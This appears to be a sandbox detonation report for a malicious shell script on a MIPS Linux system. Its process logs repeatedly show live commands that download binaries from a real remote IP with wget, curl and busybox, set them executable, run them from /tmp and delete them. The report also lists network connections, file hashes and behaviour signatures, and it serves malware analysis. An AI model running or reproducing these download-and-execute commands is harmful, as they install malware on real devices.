[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/chmod

[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0

[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/rm

[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/wget

[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/chmod

[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf

[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/rm

[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/wget

[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/chmod

[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk

[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/rm

[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/wget

[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/chmod

[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh

[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/rm

[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/wget

[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/chmod

[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC

[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/rm

[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/wget

[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/chmod

[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR

[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/rm

[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/wget

[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/chmod

[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx

[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/rm

[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:20

Reported

2024-10-25 01:23

Platform

debian9-mipsel-20240611-en

Max time kernel

78s

Max time network

79s

Command Line

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A
N/A /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 N/A
N/A /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf N/A
N/A /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk N/A
N/A /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh N/A
N/A /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC N/A
N/A /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR N/A
N/A /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A
N/A /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 N/A
N/A /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf N/A
N/A /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk N/A
N/A /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh N/A
N/A /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC N/A
N/A /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR N/A
N/A /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /usr/bin/curl N/A
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /usr/bin/curl N/A
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /usr/bin/curl N/A
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /usr/bin/curl N/A
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /usr/bin/curl N/A
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /usr/bin/curl N/A
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /usr/bin/curl N/A
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /usr/bin/curl N/A
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /usr/bin/curl N/A

Processes

/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/chmod

[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0

[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/rm

[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/wget

[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/chmod

[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf

[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/rm

[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/wget

[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/chmod

[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk

[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/rm

[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/wget

[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/chmod

[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh

[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/rm

[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/wget

[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/chmod

[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC

[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/rm

[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/wget

[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/chmod

[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR

[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/rm

[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/wget

[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/chmod

